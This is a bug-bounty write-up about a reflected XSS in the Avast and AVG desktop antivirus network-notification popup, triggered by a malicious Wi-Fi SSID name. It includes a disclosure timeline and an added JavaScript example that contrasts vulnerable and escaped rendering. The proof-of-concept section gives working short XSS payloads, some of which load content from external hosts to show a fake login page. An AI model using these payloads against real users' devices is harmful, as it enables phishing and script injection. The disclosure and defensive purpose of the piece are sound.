5,000 USD XSS Issue at Avast Desktop AntiVirus for Windows (Yes, Desktop!)

CVE-2019-18653 & CVE-2019-18654: the story of a Reflected XSS triggered from an SSID name (it also affected AVG AntiVirus, since the code of those two products is basically “merged”).

YoKo Kho
Oct 29

In the name of Allah, the Most Gracious, the Most Merciful

This article is written in two ways: one part tells the story of how I found the issue, and the other explains the basics and the references. Readers can also jump straight to the TL;DR section.

I. TL;DR

1.1. Create an SSID name containing a simple XSS payload (an SSID is limited to 32 characters). The short XSS payloads from Brute Logic and s0md3v can be used here (thanks, guys!).

1.2. Connect a Windows machine (with Avast AntiVirus installed and active) to that SSID and wait for Avast's Network Notification feature to render the SSID name and trigger the XSS payload.

Triggering the XSS via SSID Name

1.3. Report it to Avast; it was confirmed as a valid issue within about 2 days. A few months later, they judged the issue to be rather serious and decided to reward the report with $5,000.


II. Behind the Scene about How I got this Issue

A few years ago, I read a nice article by a bug hunter who had found many XSS issues at big-name companies simply by putting an XSS payload in his SSID name (I really lost that bookmark for one reason or another). In short, as he used many apps, he found quite a few of them reflecting the value of his SSID name, and the XSS was triggered. From then on, I started using an XSS payload as my SSID name (on my OS X machine).

A few months ago, I got a notebook (running Windows) from the office I work for. I installed everything I needed over a tethered connection and left Avast AntiVirus for last (at home). At home, I continued the installation and everything went fine.

Then one day I used this notebook again for a training session. In the middle of the training (day 3 or day 4), I had an issue with the connection I was using, so the notebook automatically connected to my tethering connection (now with Avast installed), and within a few seconds a popup alert from “https://local.avast.com” appeared on my desktop.

To be honest, I had no idea how it could work like that. Luckily, the class was being recorded on video, and I asked for a copy covering that period of time. Trying to figure out how the alert appeared, I finally got the answer the next day: the XSS was triggered because the embedded “Network Notification” feature (part of the Firewall) in Avast (specifically the Internet Security and Premier editions) reflected the SSID name without sanitizing it.

I wrote the report that night and got a reply about 2 days later confirming that the issue was valid.


III. Abstract

As quoted from Avast's official site, Avast, one of the largest security companies in the world, uses next-gen technologies to fight cyber-attacks in real time and is dedicated to creating a world that provides safety and privacy for all, no matter who you are, where you are, or how you connect.

Through a great deal of research, Avast tries to deliver the best endpoint protection for every user. One of their visible features is the “Firewall”, which can easily be used to manage inbound and outbound traffic.

By default, this Firewall feature alerts the user (with a popup notification) when they connect to a new network. For example, the picture below shows that the user has just connected to a wireless network with “My Hotspot” as the SSID name.

Popup Notification when Connected to new Network

Once the popup shows up, the user can choose the type of network for the SSID they connected to, such as “Private” or “Public”.

The problem is that the notification popup did not filter the special characters reflected from the SSID name. In other words, an attacker could trigger XSS on the client via the “notification popup” by using a malicious SSID name.


IV. Introduction

4.1. Cross Site Scripting (XSS)
To put it simply, this kind of vulnerability “lets” an attacker execute script through an input that does not filter special characters such as “ > < : / ; and so on. In contrast to Stored XSS, where the application saves the injected script, Reflected XSS does not store the script at all, so the target is expected and required to visit the URL that the attacker has “injected” with additional content.

In this case, Avast reflected the input (the SSID name) into the notification popup every time the user changed connection. When the SSID name contains client-side script (such as JavaScript), the notification renders it and the XSS is triggered.

The good thing is that even though the SSID name is limited to 32 characters, we can still work around the limit by loading the script from a short URL. Credits to Brute Logic and s0md3v, thanks!


4.1.1. The Short XSS Payload
When I first got the popup alert, I had no idea how to push it further. Then, Alhamdulillah, I luckily remembered having read the publications by “Brute Logic” and “s0md3v” on short XSS payloads. And the cool thing is, it works!

If you are looking for great and creative XSS payloads, I recommend both of these resources:
https://brutelogic.com.br/blog/shortest-reflected-xss-possible/
https://github.com/s0md3v/AwesomeXSS

And yes (absolutely), there are many other researchers out there sharing great and creative payloads that you can follow.


4.2. Prior Research on What Can Be Executed Using a Malicious SSID Name
As explained previously, I learned this trick from a write-up released by a bug hunter (I'm really sorry, I lost that bookmark for one reason or another). From there, I eventually found out that very detailed research in this area had been done by Deral Heiland back in 2013; he presented it at Black Hat Europe 2013.

For in-depth research and knowledge on this, refer to his presentation. Highly recommended.


4.3. Affected Version and Testing Environment
Avast:
The vulnerability was found in Avast Internet Security version 19.3.2369 (build 19.3.4241.440). It also affects Avast Free Antivirus and the Premier edition.

On the AVG side, the issue affected AVG Internet Security version 19.3.3084 (build 19.3.4241.440).

As a small note, both issues were reproduced on Windows 10 (latest patches as of March 22nd, 2019).


V. Summary of Issue

As described above, the security problem in this report is a vulnerability that allows an attacker to trigger XSS on the client via the “notification popup” by using a malicious SSID name.

In this situation, an attacker could also display a fake login page (for example, with the Avast / AVG logo) inside the “notification popup”, and the user would not be suspicious, since there is no visible URL to inspect when the script loads the fake login page.

Sample Case to Triggering the Fake Login Page - Avast
Sample Case to Triggering the Fake Login Page - AVG

VI. Proof of Concept

To complete the explanation, here are the steps needed to reproduce this issue:

6.1. Create an SSID whose name is a simple JavaScript payload. For example: ><img src=x onerror=prompt(1)>
This payload simply triggers a prompt dialog showing the character “1”.

6.2. Get the victim to connect to the prepared SSID;

6.3. After the victim connects to the prepared SSID, wait a few seconds. The popup notification will be shown and the script will be triggered:

The Script has been Triggered via Notification Popup - Avast
The Script has been Triggered via Notification Popup - AVG

6.4. Since the SSID name is limited to 32 characters, we work around it by pointing the payload at a URL-shortener link. For example, to load a login form from another portal, the payload used is: ><embed src=//tiny.cc/XYZABCX> (you could also use bit.ly).

Triggering the Login Form from other Portal to Notification Popup
Triggering the Login Form from other Portal to Notification Popup II

Even better, you can also load the script from an external URL (credits to s0md3v). Here is an example: ><embed src=//14.rs>

Triggering the script by Using the External Script
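To make the root cause concrete, here is an added JavaScript example (it is not Avast's or AVG's code and is not from the original write-up) that models a network-notification popup which interpolates the SSID name into HTML. It renders the same template two ways, once with the raw SSID (the reflected behaviour described in sections IV and VI) and once with the SSID escaped, and it checks each of the payloads quoted above against the 32-octet SSID limit from IEEE 802.11 (the limit is on bytes, not characters). The popup template, the `hasForeignTag` check and the longer `<script src=...>` sample are assumptions for illustration only.

```javascript
// Added example, not Avast's code: a toy network-notification popup that
// reflects the SSID into HTML. The vulnerable renderer concatenates the raw
// SSID (as the write-up describes); the fixed renderer escapes it first.
// Sample SSIDs below are constructed for this example; the first four are
// the payloads quoted in the write-up.

const SSID_MAX_OCTETS = 32; // IEEE 802.11: an SSID is at most 32 octets

// UTF-8 byte length of an SSID; the 32-octet limit applies to bytes.
function ssidByteLength(ssid) {
  return new TextEncoder().encode(ssid).length;
}

function fitsInSsid(payload) {
  return ssidByteLength(payload) <= SSID_MAX_OCTETS;
}

// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable (hypothetical template): the SSID is concatenated straight into
// markup, so a name like '><img src=x onerror=prompt(1)> becomes live HTML.
function renderNotificationVulnerable(ssid) {
  return `<div class="net-popup">You are now connected to "${ssid}". ` +
         `Is this a <b>Private</b> or <b>Public</b> network?</div>`;
}

// Fixed: identical template, but the SSID is escaped and shown as text.
function renderNotificationSafe(ssid) {
  return `<div class="net-popup">You are now connected to "${escapeHtml(ssid)}". ` +
         `Is this a <b>Private</b> or <b>Public</b> network?</div>`;
}

// Does the rendered markup contain any tag the template did not put there?
// The template only ever emits <div>, </div>, <b> and </b>.
function hasForeignTag(html) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.some((t) => !/^<\/?(div|b)(\s|>)/.test(t));
}

// Constructed samples: a benign name, the write-up's payloads, and one
// payload that is too long for an SSID (why short URLs are needed).
const SAMPLE_SSIDS = [
  'My Hotspot',
  '><img src=x onerror=prompt(1)>',
  '><embed src=//tiny.cc/XYZABCX>',
  '><embed src=//14.rs>',
  '><script src=https://example.com/x.js></script>',
];

// For each sample: does it fit in an SSID, and which renderer leaks markup?
function auditSsids(ssids = SAMPLE_SSIDS) {
  return ssids.map((ssid) => ({
    ssid,
    octets: ssidByteLength(ssid),
    fits: fitsInSsid(ssid),
    vulnerableLeaks: hasForeignTag(renderNotificationVulnerable(ssid)),
    safeLeaks: hasForeignTag(renderNotificationSafe(ssid)),
  }));
}

console.log(JSON.stringify(auditSsids(), null, 2));
```

The interesting rows are the three payloads from the write-up: each is 30 octets or fewer, so it fits in an SSID, and each injects a tag through the vulnerable renderer but not through the escaped one. The last sample shows the constraint the write-up works around: a full `<script src=https://...>` tag is 47 octets, which is why the author points `<embed src=//...>` at a URL shortener instead. In a real fix the SSID should be set through `textContent` rather than `innerHTML`, or escaped as above before any HTML concatenation.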

VII. Additional Information

To complete the explanation, here is a simple PoC video showing how it works:

PoC Video - Triggering the XSS Payload via SSID Name

VIII. Reporting Timeline

  • Mar 21st, 2019: Found the issue; root cause not yet known;
  • Mar 22nd, 2019: Found the root cause, then wrote and sent the report via bugs@avast.com;
  • Mar 25th, 2019: Sent the information that AVG is affected too;
  • Mar 25th, 2019: Avast replied and confirmed the bug. They said they would release a fix soon;
  • Mar 25th, 2019: Avast replied that it was not surprising that AVG was affected by the same issue. They gave a nice high-level explanation;
  • May 24th, 2019: Avast said the issue was fixed in Avast 19.4, which had already been released. They also said they would give more details once the reward was decided;
  • June 12th, 2019: Avast judged this issue to be rather serious and decided to reward the report with $5,000 (really amazing).
Reward Decision from Avast

This really broke my record for a single reward payment, and the decision really surprised me. At the time, I still didn't believe it until the money actually arrived in my PayPal account.

To Avast: thank you so much for the surprising reward and the amazing program! Really appreciated; I am lost for words to thank them.

  • Oct 30th, 2019: CVE-2019-18653 was assigned to the Avast issue and CVE-2019-18654 to the AVG issue.

IX. The Closing

Well, as readers can see, this was something I never imagined (triggering XSS in a desktop app). A few simple notes I can share (with my limited knowledge):

  • Always try to bookmark everything you read. Take a note and come back to it when you want to use those tricks on your target. In this case, I had read and saved the publications by Brute Logic and s0md3v; when I hit a hard situation (for example, triggering XSS with a limited number of characters), I went back to their write-ups and opened my notes.
  • Even though it looks silly, it is worth setting your SSID name to (for example) an XSS payload. I had used one for a few years (since the first time I read that bug hunter's write-up, thanks man!), but it only triggered in 2019, in a desktop app on Windows (it does not affect the OS X version of Avast, by the way).

Also, another vector I learned from this one is:



InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Written by YoKo Kho

Bug Hunter | OSCP | One of 2018 BugCrowd MVP | https://twitter.com/YoKoAcc | https://bugcrowd.com/YokoKho